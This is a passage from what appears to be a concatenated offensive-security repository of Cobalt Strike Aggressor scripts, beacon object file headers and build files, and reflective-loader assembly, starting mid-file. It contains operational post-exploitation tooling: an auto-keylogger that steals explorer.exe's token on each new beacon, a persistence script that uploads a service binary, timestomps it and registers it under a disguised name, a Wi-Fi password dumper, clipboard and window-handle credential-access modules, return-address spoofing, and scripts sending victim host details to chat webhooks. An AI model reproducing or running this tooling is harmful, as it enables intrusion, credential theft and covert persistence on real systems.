except: 19 | pass 20 | 21 | if 
__name__ in '__main__': 22 | try: 23 | print('0x%x' % hash_string(sys.argv[1])); 24 | except IndexError: 25 | print('usage: %s [string]' % sys.argv[0]); 26 | -------------------------------------------------------------------------------- /Cobatl Strike/AddFirewallRule/addfirewallrule.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | //AddFirewallRule 4 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit); 5 | DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void); 6 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv); 7 | WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *); 8 | WINBASEAPI void WINAPI OLEAUT32$SysFreeString(BSTR); 9 | WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); 10 | WINBASEAPI int __cdecl MSVCRT$strcmp(const char *str1, const char *str2); 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Inject Kit/KIT/TartarusGate/Makefile: -------------------------------------------------------------------------------- 1 | # Makefile 2 | 3 | # Variables 4 | SRC_DIR := src 5 | BUILD_DIR := bin 6 | TARGET_ARCH := x86_64-w64-mingw32 7 | CFLAGS := -masm=intel 8 | 9 | # Source files 10 | SOURCES := process_inject_spawn.c process_inject_explicit.c 11 | 12 | # Object files 13 | OBJECTS := $(SOURCES:%.c=$(BUILD_DIR)/%.x64.o) 14 | 15 | # Default rule 16 | all: $(OBJECTS) 17 | 18 | # Rule for building .o files from .c files 19 | $(BUILD_DIR)/%.x64.o: $(SRC_DIR)/%.c 20 | @echo "Compile $<" 21 | @mkdir -p $(BUILD_DIR) 22 | @$(TARGET_ARCH)-gcc -c $< -o $@ $(CFLAGS) 23 | 24 | # Clean rule 25 | clean: 26 | @rm -rf $(BUILD_DIR)/*.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP/headers/misconf_checks/path_dll_hijack.h: 
-------------------------------------------------------------------------------- 1 | void pathDLLHijack() { 2 | std::cout << "\n\n[*] Checking values of %PATH% for DLL Hijack...\n\n"; 3 | 4 | const DWORD buffSize = 65535; 5 | static char buffer[buffSize]; 6 | GetEnvironmentVariableA("Path", buffer, buffSize); 7 | // NOTE(review): the return value of GetEnvironmentVariableA is not checked. When the variable is missing, or its value does not fit in buffSize characters, the value is not copied, so pathVar below is built from whatever the static buffer already holds (zero-initialised on the first call). The delimiter string declared below is never used; strSplit is passed ';' directly. Each directory from the split is then tested with HasPermissionF for GENERIC_WRITE and printed when writable. 8 | std::string pathVar = buffer; 9 | std::string delimiter = ";"; 10 | std::vector pathVector = strSplit(pathVar, ';'); 11 | 12 | for (auto path : pathVector) { 13 | if (HasPermissionF(path, GENERIC_WRITE)) { 14 | std::cout << "\tWritable: " << path << "\n"; 15 | } 16 | } 17 | 18 | } -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/hasher.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | def RSHasher(api_name: str) -> int: 4 | a = 87621 5 | b = 316469 6 | h = 0 7 | for c in api_name.encode("utf-8"): 8 | h = h * a + c 9 | a = a * b 10 | return h & 0xFFFFFFFF # keep it 32-bit 11 | 12 | def main(): 13 | if len(sys.argv) < 2: 14 | print("Usage: python hasher.py ...") 15 | sys.exit(1) 16 | 17 | for api_name in sys.argv[1:]: 18 | hash_val = RSHasher(api_name) 19 | print(f"{api_name:<20} -> 0x{hash_val:08X}\n----------------------------------") 20 | 21 | if __name__ == "__main__": 22 | main() 23 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/cred_access/clipboard_grab/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.x64.o, $(SRC)) 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | 6 | # Critical BOF compilation flags 7 | CFLAGS := -c -Os -fno-builtin -fno-builtin-memset -fno-builtin-memcpy -fno-builtin-memmove 8 | CFLAGS += -fno-asynchronous-unwind-tables -fno-unwind-tables 9 | CFLAGS += -fno-stack-protector -fno-stack-check
-mno-stack-arg-probe 10 | CFLAGS += -nostdlib -ffunction-sections -fdata-sections 11 | 12 | all: $(OBJS) 13 | 14 | %.x64.o: %.c 15 | $(CC_x64) $(CFLAGS) -o $@ $< 16 | $(STRIP_x64) --strip-unneeded $@ 17 | 18 | clean: 19 | rm -f *.o *.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Psk/Psk.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | #register help 5 | beacon_command_register("psk", "Show detailed information from the windows kernel and loaded driver modules.", 6 | "Synopsis: psk\n\n" . 7 | "Shows a detailed list of the windows kernel and all loaded kernel modules.\n"); 8 | 9 | alias psk { 10 | $bid = $1; 11 | 12 | # Read in the right BOF file 13 | $handle = openf(script_resource("Psk." . barch($bid) . ".o")); 14 | $data = readb($handle, -1); 15 | closef($handle); 16 | 17 | blog($bid, "Enumerating the windows kernel and loaded driver modules."); 18 | beacon_inline_execute($bid, $data, "go", $null); 19 | } 20 | -------------------------------------------------------------------------------- /Cobatl Strike/SystemInfo/systeminfo.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "systeminfo", "Enumerate system information.", 5 | "INFO:\nEnumerate system information via WMI.\n\n" . 
6 | "USAGE:\nsysteminfo\n\n"); 7 | 8 | alias systeminfo { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("systeminfo.o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | $arg_data = bof_pack($bid); 17 | 18 | blog($bid, "Tasked to connect to ROOT\\CIMV2 to fetch system information.."); 19 | beacon_inline_execute($bid, $data, "go", $arg_data); 20 | 21 | } 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/asm/x64/GetIp.asm: -------------------------------------------------------------------------------- 1 | ;; 2 | ;; Reflective Loader 3 | ;; 4 | ;; GuidePoint Security LLC 5 | ;; 6 | ;; Threat and Attack Simulation 7 | ;; 8 | [BITS 64] 9 | 10 | ;; 11 | ;; Export 12 | ;; 13 | GLOBAL GetIp 14 | GLOBAL Hooks 15 | 16 | [SECTION .text$C] 17 | 18 | Hooks: 19 | ;; 20 | ;; Arbitrary symbol to reference as 21 | ;; start of hook pages 22 | ;; 23 | nop 24 | 25 | [SECTION .text$F] 26 | 27 | GetIp: 28 | ;; 29 | ;; Execute next instruction 30 | ;; 31 | call get_ret_ptr 32 | 33 | get_ret_ptr: 34 | ;; 35 | ;; Pop address and sub diff 36 | ;; 37 | pop rax 38 | sub rax, 5 39 | ret 40 | 41 | 42 | Leave: 43 | db 'E', 'N', 'D', 'O', 'F', 'C', 'O', 'D', 'E' 44 | -------------------------------------------------------------------------------- /Cobatl Strike/StartWebClient/StartWebClient.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa, Stan Hegt 2 | #@outflank.nl 3 | #Code based on https://www.tiraniddo.dev/2015/03/starting-webclient-service.html 4 | 5 | beacon_command_register("StartWebClient", "Starting WebClient Service Programmatically.", 6 | "Synopsis: StartWebClient\n\n" . 7 | "Starting WebClient Service Programmatically\n\n"); 8 | 9 | alias StartWebClient { 10 | $bid = $1; 11 | 12 | # Read in the right BOF file 13 | $handle = openf(script_resource("StartWebClient." . barch($bid) . 
".o")); 14 | $data = readb($handle, -1); 15 | closef($handle); 16 | 17 | beacon_inline_execute($bid, $data, "go", $null); 18 | } 19 | -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/sleep-down-when-no-operators.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | 3 | # increases the sleep interval on all Beacons when there are no operators logged in 4 | 5 | #value to set all Beacons' sleep interval and jitter to when operators log off (specified in seconds) 6 | $sleep_value = 300; 7 | $jitter_value = 20; 8 | 9 | 10 | on event_quit { 11 | #NOTE: You will need to modify the below number higher if you use agscript to log in and run scripts. 12 | if (size(users()) <= 2) { 13 | foreach $beacon (beacons()) { 14 | #ignore SMB Beacons 15 | if ($beacon["pbid"] eq '') { 16 | bsleep($beacon["id"], $sleep_value, $jitter_value); 17 | } 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /Cobalt Strike Zig Artifact Kit/build.zig: -------------------------------------------------------------------------------- 1 | const std = @import("std"); 2 | 3 | pub fn build(b: *std.Build) void { 4 | const exe = b.addExecutable(.{ 5 | .name = "artifact64big", 6 | .root_source_file = b.path("template.zig"), 7 | .target = b.resolveTargetQuery(.{ .cpu_arch = .x86_64, .os_tag = .windows }), 8 | .optimize = .ReleaseSmall, 9 | }); 10 | 11 | const payloadSize = b.option(u32, "payloadSize", "size of shellcode") orelse 350000; 12 | 13 | const options = b.addOptions(); 14 | options.addOption(u32, "payloadSize", payloadSize); 15 | 16 | exe.root_module.addOptions("build_options", options); 17 | 18 | b.installArtifact(exe); 19 | } 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/sleep-down-when-no-operators.cna: 
-------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | 3 | # increases the sleep interval on all Beacons when there are no operators logged in 4 | 5 | #value to set all Beacons' sleep interval and jitter to when operators log off (specified in seconds) 6 | $sleep_value = 300; 7 | $jitter_value = 20; 8 | 9 | 10 | on event_quit { 11 | #NOTE: You will need to modify the below number higher if you use agscript to log in and run scripts. 12 | if (size(users()) <= 2) { 13 | foreach $beacon (beacons()) { 14 | #ignore SMB Beacons 15 | if ($beacon["pbid"] eq '') { 16 | bsleep($beacon["id"], $sleep_value, $jitter_value); 17 | } 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /Cobatl Strike/C2 Crash/dict/process.txt: -------------------------------------------------------------------------------- 1 | NetSync.exe 2 | QuickBackup.exe 3 | AudioDriver.exe 4 | TaskManagerPlus.exe 5 | FileWatcher.exe 6 | CryptoGuard.exe 7 | UpdateService.exe 8 | MemoryOptimizer.exe 9 | ScreenCapture.exe 10 | DataEncryptor.exe 11 | PrintSpooler.exe 12 | SystemMonitor.exe 13 | CloudSyncAgent.exe 14 | VideoRenderer.exe 15 | ProcessScanner.exe 16 | DriverUpdater.exe 17 | AppLauncher.exe 18 | NetworkInspector.exe 19 | CacheCleaner.exe 20 | RegistryHelper.exe 21 | FileIndexer.exe 22 | SecurityAgent.exe 23 | UpdateChecker.exe 24 | AudioEnhancer.exe 25 | ClipboardManager.exe 26 | SessionTracker.exe 27 | FirewallControl.exe 28 | VirtualPrinter.exe 29 | SyncService.exe 30 | BackupScheduler.exe -------------------------------------------------------------------------------- /Loader/Titan Ldr/asm/x86/GetIp.asm: -------------------------------------------------------------------------------- 1 | ;; 2 | ;; Reflective Loader 3 | ;; 4 | ;; GuidePoint Security LLC 5 | ;; 6 | ;; Threat and Attack Simulation 7 | ;; 8 | [BITS 32] 9 | 10 | ;; 11 | ;; Export 12 | ;; 13 | GLOBAL _GetIp 14 | GLOBAL _Hooks 15 | 
16 | [SECTION .text$C] 17 | 18 | _Hooks: 19 | ;; 20 | ;; Arbitrary symbol to reference as 21 | ;; start of hook pages 22 | ;; 23 | nop 24 | 25 | [SECTION .text$F] 26 | 27 | _GetIp: 28 | ;; 29 | ;; Execute next instruction 30 | ;; 31 | call _get_ret_ptr 32 | 33 | _get_ret_ptr: 34 | ;; 35 | ;; Pop address and sub diff 36 | ;; 37 | pop eax 38 | sub eax, 5 39 | ret 40 | 41 | 42 | _Leave: 43 | db 'E', 'N', 'D', 'O', 'F', 'C', 'O', 'D', 'E' 44 | -------------------------------------------------------------------------------- /Loader/kits/AnnoyKit/scripts/annoySongs/Play-ImperialMarch.ps1: -------------------------------------------------------------------------------- 1 | #Taken from https://gist.github.com/SadProcessor 2 | function Play-ImperialMarch(){ 3 | [console]::beep(440,500) 4 | [console]::beep(440,500) 5 | [console]::beep(440,500) 6 | [console]::beep(349,350) 7 | [console]::beep(523,150) 8 | [console]::beep(440,500) 9 | [console]::beep(349,350) 10 | [console]::beep(523,150) 11 | [console]::beep(440,1000) 12 | [console]::beep(659,500) 13 | [console]::beep(659,500) 14 | [console]::beep(659,500) 15 | [console]::beep(698,350) 16 | [console]::beep(523,150) 17 | [console]::beep(415,500) 18 | [console]::beep(349,350) 19 | [console]::beep(523,150) 20 | [console]::beep(440,1000) 21 | } 22 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/cred_access/window_handles_enum/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.x64.o, $(SRC)) 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | 6 | # Critical BOF compilation flags 7 | CFLAGS := -c -Os -fno-builtin -fno-builtin-memset -fno-builtin-memcpy -fno-builtin-memmove 8 | CFLAGS += -fno-asynchronous-unwind-tables -fno-unwind-tables 9 | CFLAGS += -fno-stack-protector -fno-stack-check -mno-stack-arg-probe 10 | CFLAGS += -nostdlib 
-ffunction-sections -fdata-sections 11 | 12 | all: $(OBJS) 13 | 14 | %.x64.o: %.c 15 | $(CC_x64) $(CFLAGS) -o $@ $< 16 | $(STRIP_x64) --strip-unneeded $@ 17 | 18 | clean: 19 | rm -f *.o *.x64.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike DingtalkBot/CS-Dingtalk-Bot.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid")); 3 | local('$internalIP $computerName $userName'); 4 | $internalIP = replace(beacon_info($1,"internal")," ","_"); 5 | $externalIP = replace(beacon_info($1,"external")," ","_"); 6 | $computerName = replace(beacon_info($1,"computer")," ","_"); 7 | $userName = replace(beacon_info($1,"user")," ","_"); 8 | $cmd = 'python3 /root/main.py' . " --computernam " . $computerName . " --internalip " . $internalIP . " --externalip " . $externalIP . " --username " . $userName; 9 | println("Sending server: " . $cmd); 10 | exec($cmd); 11 | } 12 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/service-reboot.cna: -------------------------------------------------------------------------------- 1 | sub persist { 2 | bcd($1, 'c:\windows\system32'); 3 | 4 | # create a netsrv.exe file and co-locate it with this script. 5 | # remember netsrv.exe MUST be a service EXE. 
6 | bupload($1, script_resource("netsrv.exe")); 7 | btimestomp($1, "netsrv.exe", "cmd.exe"); 8 | bshell($1, 'sc delete netsrv'); 9 | bshell($1, 'sc create netsrv binPath= "C:\windows\system32\netsrv.exe" start= auto DisplayName= "System Network Service"'); 10 | bshell($1, 'sc start netsrv'); 11 | } 12 | 13 | popup beacon_top { 14 | item "Create Service" { 15 | local('$bid'); 16 | foreach $bid ($1) { 17 | persist($bid); 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /Cobatl Strike/Psc/Psc.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | #register help 5 | beacon_command_register("psc", "Show detailed information from processes with established TCP and RDP connections.", 6 | "Synopsis: psc\n\n" . 7 | "Shows a detailed list of all processes with established TCP and RDP connections.\n"); 8 | 9 | alias psc { 10 | $bid = $1; 11 | 12 | # Read in the right BOF file 13 | $handle = openf(script_resource("Psc." . barch($bid) . 
".o")); 14 | $data = readb($handle, -1); 15 | closef($handle); 16 | 17 | blog($bid, "Tasked beacon to enumerate processes with established TCP and RDP connections."); 18 | beacon_inline_execute($bid, $data, "go", $null); 19 | } 20 | -------------------------------------------------------------------------------- /Und3rf10w/auto-keylogger.cna: -------------------------------------------------------------------------------- 1 | sub getexplorerpid { 2 | bps($1, lambda({ 3 | local('$pid $name $entry'); 4 | foreach $entry (split("\n", $2)) { 5 | ($name, $ppid, $pid, $arch) = split("\\s+", $entry); 6 | println($entry); 7 | # println("Name: $name PID: $pid "); 8 | if ($name eq "explorer.exe") { 9 | # $1 is our Beacon ID, $pid is the PID of explorer.exe 10 | [$callback: $1, $pid]; 11 | } 12 | } 13 | }, $callback => $2)); 14 | } 15 | 16 | 17 | on beacon_initial { 18 | getexplorerpid($1, { 19 | bsteal_token($1, int($2)); 20 | bkeylogger($1, $2, "x64"); 21 | }); 22 | blog($1, "Automatic keylogger activated"); 23 | bnote($1, "Auto-keylogger") 24 | } -------------------------------------------------------------------------------- /Cobatl Strike/Beacon Notifier Discord/notify.cna: -------------------------------------------------------------------------------- 1 | #Change request path 2 | #You can change CS to identify different CS instances 3 | 4 | $pythonPath = "/PATH/request.py"; 5 | 6 | on beacon_initial { 7 | $computer = beacon_info($1, "computer"); 8 | $external = beacon_info($1, "external"); 9 | $internal = beacon_info($1, "internal"); 10 | $user = beacon_info($1, "user"); 11 | $beacon_text = "================================ 12 | New Beacon from CS! 
13 | User : $user 14 | Computer Name : $computer 15 | External IP : $external 16 | Internal IP : $internal 17 | ================================"; 18 | @command = @('python3',$pythonPath,$beacon_text); 19 | exec(@command); 20 | } 21 | 22 | 23 | -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/DOTNET45/readme.txt: -------------------------------------------------------------------------------- 1 | These binaries are compiled against .NET Framework 4.5.0 (as opposed to the .NET Framework 2.0). The .NET Framework 4.5 provides more and improved functionality; however, it is not included by default in older versions of Microsoft Windows [1]. See the Notes column of the Cheatsheet for info on which additional cmdlets are supported [2]. 2 | 3 | In NoPowerShell v1.23 the Compress-Archive and Expand-Archive cmdlets require .NET 4.5+. 4 | 5 | 6 | [1] Overview of .NET Framework release history 7 | https://en.wikipedia.org/wiki/.NET_Framework_version_history#Overview 8 | [2] NoPowerShell cmdlet Cheatsheet 9 | https://github.com/bitsadmin/nopowershell/blob/master/CHEATSHEET.md -------------------------------------------------------------------------------- /Cobatl Strike/WiFiPasswords/wifipasswords.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "wifipasswords", "Dump all stored Wi-Fi passwords.", 5 | "INFO:\nEnumerates all saved SSID's, then retrieves each AP's stored plaintext password\n\n" .
6 | "USAGE:\nwifipasswords\n\n"); 7 | 8 | alias wifipasswords { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("wifipasswords.o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | $arg_data = bof_pack($bid); 17 | 18 | blog($bid, "Tasked to enumerate SSID's and dump stored WiFi passwords.."); 19 | beacon_inline_execute($bid, $data, "go", $arg_data); 20 | } 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Loader/AceLdr/src/hooks/hooks.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "../include.h" 4 | 5 | SECTION( D ) HANDLE WINAPI GetProcessHeap_Hook(); 6 | SECTION( D ) VOID WINAPI Sleep_Hook( DWORD dwMilliseconds ); 7 | SECTION( D ) LPVOID WINAPI HeapAlloc_Hook( HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes ); 8 | SECTION( D ) PVOID NTAPI RtlAllocateHeap_Hook( PVOID heapHandle, ULONG flags, SIZE_T size ); 9 | SECTION( D ) HINTERNET InternetConnectA_Hook( HINTERNET hInternet, LPCSTR lpszServerName, INTERNET_PORT nServerPort, LPCSTR lpszUserName, LPCSTR lpszPassword, DWORD dwService, DWORD dwFlags, DWORD_PTR dwContext ); 10 | SECTION( D ) NTSTATUS NtWaitForSingleObject_Hook( HANDLE handle, BOOLEAN alertable, PLARGE_INTEGER timeout ); 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Sweet Potato CS/Com/IEnumSTATSTG.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SweetPotato { 5 | [ComImport] 6 | [Guid("0000000d-0000-0000-C000-000000000046")] 7 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 8 | public interface IEnumSTATSTG { 9 | // The user needs to allocate an STATSTG array whose size is celt. 
10 | [PreserveSig] 11 | uint 12 | Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out] STATSTG[] rgelt, out uint pceltFetched); 13 | 14 | void Skip(uint celt); 15 | 16 | void Reset(); 17 | 18 | [return: MarshalAs(UnmanagedType.Interface)] 19 | IEnumSTATSTG Clone(); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Cobatl Strike/ForceLockScreen/forcelockscreen.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "forcelockscreen", "Force the lock screen of the current user session.", 5 | "INFO:\nForce the lock screen of the current user session.\n\n" . 6 | "USAGE:\nforcelockscreen\n\n"); 7 | 8 | alias forcelockscreen { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("forcelockscreen.o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | 17 | $arg_data = bof_pack($bid); 18 | 19 | blog($bid, "Tasked to lock the current user's screen.."); 20 | beacon_inline_execute($bid, $data, "go", $arg_data); 21 | 22 | } 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/common/anticrash.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "bofdefs.h" 3 | //For some reason char *[] is invalid in BOF files 4 | //So this function exists to work around that problem 5 | 6 | //makes a char *[] since we can't seem to otherwise 7 | //count is the number of strings you're passing in; the function will crash if this is wrong 8 | 9 | //The caller must call intFree on the returned result 10 | char ** antiStringResolve(unsigned int count, ...)
11 | { 12 | va_list strings; 13 | va_start(strings, count); 14 | char ** result = intAlloc(sizeof(char *) * count); 15 | for(int i = 0; i < count; i++) 16 | { 17 | result[i] = (char *)va_arg(strings, char *); 18 | } 19 | va_end(strings); 20 | return result; 21 | } -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/kits/AnnoyKit/scripts/annoySongs/Play-ImperialMarch.ps1: -------------------------------------------------------------------------------- 1 | #Taken from https://gist.github.com/SadProcessor 2 | function Play-ImperialMarch(){ 3 | [console]::beep(440,500) 4 | [console]::beep(440,500) 5 | [console]::beep(440,500) 6 | [console]::beep(349,350) 7 | [console]::beep(523,150) 8 | [console]::beep(440,500) 9 | [console]::beep(349,350) 10 | [console]::beep(523,150) 11 | [console]::beep(440,1000) 12 | [console]::beep(659,500) 13 | [console]::beep(659,500) 14 | [console]::beep(659,500) 15 | [console]::beep(698,350) 16 | [console]::beep(523,150) 17 | [console]::beep(415,500) 18 | [console]::beep(349,350) 19 | [console]::beep(523,150) 20 | [console]::beep(440,1000) 21 | } 22 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumDotnet/enumdotnet.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "enumdotnet", "Find processes that most likely have .NET loaded.", 5 | "INFO:\nFind processes that most likely have .NET loaded by searching for the section name: \BaseNamedObjects\Cor_Private_IPCBlock(_v4)_\n\n" . 
6 | "USAGE:\nenumdotnet\n\n"); 7 | 8 | 9 | alias enumdotnet { 10 | $bid = $1; 11 | 12 | # Read in the right BOF file 13 | $handle = openf(script_resource("enumdotnet.o")); 14 | $data = readb($handle, -1); 15 | closef($handle); 16 | 17 | blog($bid, "Tasked to search for processes that have .NET loaded.."); 18 | 19 | beacon_inline_execute($bid, $data, "go", $null); 20 | } 21 | 22 | 23 | -------------------------------------------------------------------------------- /Cobatl Strike/Screenshot BOF/common/anticrash.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "bofdefs.h" 3 | //For some reason char *[] is invalid in BOF files 4 | //So this function exists to work around that problem 5 | 6 | //makes a char *[] since we can't seem to otherwise 7 | //count is the number of strings you're passing in; the function will crash if this is wrong 8 | 9 | //The caller must call intFree on the returned result 10 | char ** antiStringResolve(unsigned int count, ...) 11 | { 12 | va_list strings; 13 | va_start(strings, count); 14 | char ** result = intAlloc(sizeof(char *) * count); 15 | for(int i = 0; i < count; i++) 16 | { 17 | result[i] = (char *)va_arg(strings, char *); 18 | } 19 | va_end(strings); 20 | return result; 21 | } -------------------------------------------------------------------------------- /Loader/AceLdr/src/retaddr.c: -------------------------------------------------------------------------------- 1 | // 2 | // https://www.unknowncheats.me/forum/anti-cheat-bypass/268039-x64-return-address-spoofing-source-explanation.html 3 | // 4 | 5 | 6 | #include "include.h" 7 | 8 | SECTION( E ) PVOID SpoofRetAddr( PVOID function, HANDLE module, ULONG size, PVOID a, PVOID b, PVOID c, PVOID d, PVOID e, PVOID f, PVOID g, PVOID h ) 9 | { 10 | PVOID Trampoline; 11 | 12 | if( function != NULL ) 13 | { 14 | Trampoline = FindGadget( module, size ); 15 | if( Trampoline != NULL ) 16 | { 17 | PRM param = { Trampoline, function }; 18 | return Spoof( a, b, c,
d, ¶m, NULL, e, f, g, h ); 19 | }; 20 | }; 21 | 22 | return NULL; 23 | }; 24 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/slack-notify-beacon.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | 3 | #set this info: 4 | #Include the '#' and ':' in the corresponding scalars 5 | $slack_channel = "#SLACK_CHANNEL_GOES_HERE"; 6 | $slack_emoji = ':skeleton:'; 7 | $slack_webhookURL = 'https://hooks.slack.com/services/TXXXXXXXX/YYYYYYYYY/ZZZZZZZZZZZZZZZZZZZZZZZZ'; 8 | 9 | $teamserver_hostname = 'HOSTNAME-GOES-HERE'; 10 | 11 | 12 | on beacon_initial { 13 | @curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Notifier Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"New Beacon on ' . $teamserver_hostname . '. Commence the jigglin!"}',$slack_webhookURL); 14 | exec(@curl_command); 15 | } -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/slack-notify-beacon.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | 3 | #set this info: 4 | #Include the '#' and ':' in the corresponding scalars 5 | $slack_channel = "#SLACK_CHANNEL_GOES_HERE"; 6 | $slack_emoji = ':skeleton:'; 7 | $slack_webhookURL = 'https://hooks.slack.com/services/TXXXXXXXX/YYYYYYYYY/ZZZZZZZZZZZZZZZZZZZZZZZZ'; 8 | 9 | $teamserver_hostname = 'HOSTNAME-GOES-HERE'; 10 | 11 | 12 | on beacon_initial { 13 | @curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Notifier Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"New Beacon on ' . $teamserver_hostname . '. 
Commence the jigglin!"}',$slack_webhookURL); 14 | exec(@curl_command); 15 | } -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/slack-notify-beacon.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | 3 | #set this info: 4 | #Include the '#' and ':' in the corresponding scalars 5 | $slack_channel = "#SLACK_CHANNEL_GOES_HERE"; 6 | $slack_emoji = ':skeleton:'; 7 | $slack_webhookURL = 'https://hooks.slack.com/services/TXXXXXXXX/YYYYYYYYY/ZZZZZZZZZZZZZZZZZZZZZZZZ'; 8 | 9 | $teamserver_hostname = 'HOSTNAME-GOES-HERE'; 10 | 11 | 12 | on beacon_initial { 13 | @curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Notifier Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"New Beacon on ' . $teamserver_hostname . '. Commence the jigglin!"}',$slack_webhookURL); 14 | exec(@curl_command); 15 | } --------------------------------------------------------------------------------